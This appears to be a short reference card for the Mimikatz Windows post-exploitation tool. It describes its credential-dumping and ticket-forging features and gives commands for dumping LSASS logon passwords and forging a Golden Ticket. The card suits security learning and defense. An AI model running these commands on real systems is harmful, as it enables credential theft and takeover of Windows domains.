Mimikatz

Benjamin Delpy's Windows credential-theft Swiss Army knife.

// what it is

Description

Dumps NTLM hashes, Kerberos tickets, and plaintext passwords from LSASS; forges Golden and Silver tickets; performs Pass-the-Hash and Pass-the-Ticket. Released in 2007 'as an educational tool', it single-handedly invented modern Windows credential tradecraft.

// use cases

What people use it for

  • Dump cached credentials from LSASS
  • Forge Golden Tickets
  • Extract Kerberos tickets for Pass-the-Ticket

// commands

The commands you'll type

Enable debug + dump

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Golden ticket

mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-... /krbtgt:<hash> /ptt

// facts

category: Post-Exploit
platforms: WIN
license: FOSS
difficulty: Advanced
